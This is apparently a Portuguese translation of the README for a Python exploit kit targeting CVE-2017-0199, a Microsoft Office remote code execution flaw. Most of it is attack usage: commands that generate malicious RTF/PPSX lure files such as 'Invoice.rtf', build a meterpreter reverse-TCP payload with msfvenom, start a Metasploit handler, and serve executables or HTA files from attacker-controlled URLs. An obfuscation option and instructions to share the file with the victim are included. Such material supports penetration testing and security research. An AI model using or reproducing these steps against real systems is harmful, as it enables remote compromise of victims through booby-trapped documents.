
Kit de exploração em Python para CVE-2017-0199 (RCE do Microsoft Office) que gera arquivos RTF/PPSX maliciosos e entrega payloads do Metasploit ou personalizados às vítimas.
Exploit toolkit CVE-2017-0199 - v4.0 é um script Python prático que fornece a pentesters e pesquisadores de segurança uma maneira rápida e eficaz de testar o RCE do Microsoft Office. Ele pode gerar um arquivo RTF/PPSX malicioso e entregar metasploit / meterpreter / outros payloads à vítima sem qualquer configuração complexa.
Este programa é apenas para fins educacionais. Não o utilize sem permissão. A isenção de responsabilidade padrão se aplica, especialmente o fato de que eu (bhdresh) não me responsabilizo por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de Internet NÃO assume responsabilidade pelo conteúdo ou uso indevido destes programas ou de seus derivados. Ao usar este programa, você aceita que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é de responsabilidade do bhdresh.
Por fim, este é um desenvolvimento pessoal, respeite sua filosofia e não o use para más intenções!
Licença CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
Foram introduzidas as seguintes capacidades ao script
- Gerar arquivo PPSX malicioso
- Modo de exploração para arquivo PPSX gerado
- template.ppsx atualizado
Versão: Python versão 2.7.13
1) Gerar arquivo RTF malicioso
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Opcional, se usar MSF Payload): Gerar payload metasploit e iniciar handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Iniciar toolkit no modo de exploração para entregar payload local
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) Gerar arquivo RTF malicioso
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Iniciar toolkit no modo de exploração para entregar payload remoto
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) Gerar arquivo RTF malicioso
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Iniciar toolkit no modo de exploração para entregar arquivo HTA personalizado
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
Este é um toolkit útil para explorar o CVE-2017-0199 (RCE do Microsoft Office)
Modos:
-M gen Gerar apenas arquivo malicioso
Gerar arquivo RTF/PPSX malicioso:
-w <Filename.rtf/Filename.ppsx> Nome do arquivo RTF/PPSX malicioso (Compartilhe este arquivo com a vítima).
-u <http://attacker.com/test.hta> O caminho para um arquivo HTA/SCT. Normalmente, deve ser um domínio ou IP onde esta ferramenta está em execução.
Por exemplo, http://attackerip.com/test.doc (Esta URL será incluída no arquivo RTF/PPSX malicioso e será solicitada assim que a vítima abrir o arquivo RTF malicioso.
-t RTF|PPSX (padrão = RTF) Tipo do arquivo a ser gerado.
-x 0|1 (padrão = 0) Gerar arquivo RTF ofuscado. 0 = Desativar, 1 = Ativar.
-M exp Iniciar modo de exploração
Exploração:
-t RTF|PPSX (padrão = RTF) Tipo de arquivo a ser explorado.
-H </tmp/custom> Caminho local de um arquivo HTA/SCT personalizado que deve ser entregue e executado no alvo.
NOTA: Esta opção não entregará payloads especificados através das opções "-e" e "-l"
-p <TCP port:Default 80> Número da porta local.
-e <http://attacker.com/shell.exe> O caminho de um arquivo executável / shell meterpreter / payload que deve ser executado no alvo.
-l </tmp/shell.exe> Se o payload estiver hospedado localmente, especifique o caminho local de um arquivo executável / shell meterpreter / payload.
@nixawk pela amostra RTF, @Li Haifei, @bhdresh
Obviamente, não sou um desenvolvedor em tempo integral, então espere alguns contratempos
Por favor, reporte bugs e problemas através de https://github.com/bhdresh/CVE-2017-0199/issues/new